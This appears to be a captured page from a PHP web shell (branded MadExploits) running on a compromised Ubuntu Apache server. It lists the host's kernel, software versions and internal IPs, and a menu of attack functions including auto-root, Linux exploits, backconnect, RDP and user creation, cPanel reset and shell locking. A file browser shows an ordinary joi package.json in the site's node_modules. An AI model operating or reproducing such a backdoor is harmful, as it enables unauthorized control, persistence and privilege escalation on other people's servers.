Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
server /
node_modules /
joi /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
LICENSE.md
1.49
KB
-rwxr-xr-x
README.md
458
B
-rwxr-xr-x
package.json
1.25
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "joi", "description": "Object schema validation", "version": "18.0.2", "repository": { "url": "git://github.com/hapijs/joi", "type": "git" }, "engines": { "node": ">= 20" }, "main": "lib/index.js", "types": "lib/index.d.ts", "browser": "dist/joi-browser.min.js", "files": [ "lib/**/*", "dist/*" ], "keywords": [ "schema", "validation" ], "dependencies": { "@hapi/address": "^5.1.1", "@hapi/formula": "^3.0.2", "@hapi/hoek": "^11.0.7", "@hapi/pinpoint": "^2.0.1", "@hapi/tlds": "^1.1.1", "@hapi/topo": "^6.0.2", "@standard-schema/spec": "^1.0.0" }, "devDependencies": { "@hapi/bourne": "^3.0.0", "@hapi/code": "^9.0.3", "@hapi/eslint-plugin": "^7.0.0", "@hapi/joi-legacy-test": "npm:@hapi/joi@15.x.x", "@hapi/lab": "^26.0.0", "@types/node": "^20.17.47", "typescript": "^5.8.3" }, "scripts": { "prepublishOnly": "cd browser && npm install && npm run build", "test": "lab -t 100 -a @hapi/code -L -Y", "test-cov-html": "lab -r html -o coverage.html -a @hapi/code" }, "license": "BSD-3-Clause" }
Close